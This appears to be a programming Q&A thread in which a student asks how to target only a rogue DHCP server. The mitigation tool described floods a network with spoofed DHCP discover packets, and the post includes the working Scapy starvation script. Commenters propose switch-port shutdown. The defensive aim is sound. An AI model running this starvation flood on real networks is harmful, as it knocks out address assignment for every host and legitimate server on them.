0

So for a project i'm trying to detect and mitigate rogue DHCP servers on networks. I had everything done, I created a script which would construct discovery packets (with Scapy), if more than one response is detected, I have another script which will DoS all DHCP servers on a network with DHCP starvation and that worked okay.

However I met up with my project supervisor today and he told me that I should only DoS the DHCP server that is rogue, where my script DoSes ALL DHCP servers.

I have no idea how I would go about this. Has anyone any ideas?

from scapy.all import *
from time import sleep
from threading import Thread

conf.checkIPaddr = False

pkt = Ether(src=RandMAC(), dst='ff:ff:ff:ff:ff:ff')
pkt /= IP(src='0.0.0.0', dst='255.255.255.255')
pkt /= UDP(sport=68, dport=67)
pkt /= BOOTP(chaddr=RandString(12, '0123456789abcdef'))
pkt /= DHCP(options=[('message-type', 'discover'), 'end'])

sendp(pkt, loop=1)
Ryan
  • 1
  • 2
  • If you're detecting the rogue DHCP servers why can't you just DoS them? – moritzg May 09 '17 at 19:16
  • @moritzg, how would you modify the above code (which is sending packets originating from a broadcast address) to do that? Which is to say -- you'd need a different, less-destructive attack. – Charles Duffy May 09 '17 at 19:28
  • @Ryan, if you're equipped for it, I'd tend to suggest a different approach altogether -- killing the port (for a configurable time period) if you're running managed switches, for example. (Assuming good managed switches, you should be able to set up a mirror port to receive all traffic matching a pattern, and get *only* DHCP traffic directed for your monitoring, making detection easy). – Charles Duffy May 09 '17 at 19:31
  • That's the problem, the code above works by flooding discover packets by broadcasting, meaning any available DHCP servers will try respond. I'm not quite sure how to target it to one server. I can restrict it to one subnet but that's not very helpful for a detection tool. – Ryan May 09 '17 at 20:41
  • @CharlesDuffy I have 7 days from today so I don't think I have the time to take up a completely different approach haha but the detection is working pretty well, I just have no way to target a specific DHCP ip address. The above code is my method of DoSing the whole network (all DHCP servers). In all honestly i'm very new to this so if what i'm saying doesn't make sense, forgive me XD – Ryan May 09 '17 at 20:45

0 Answers0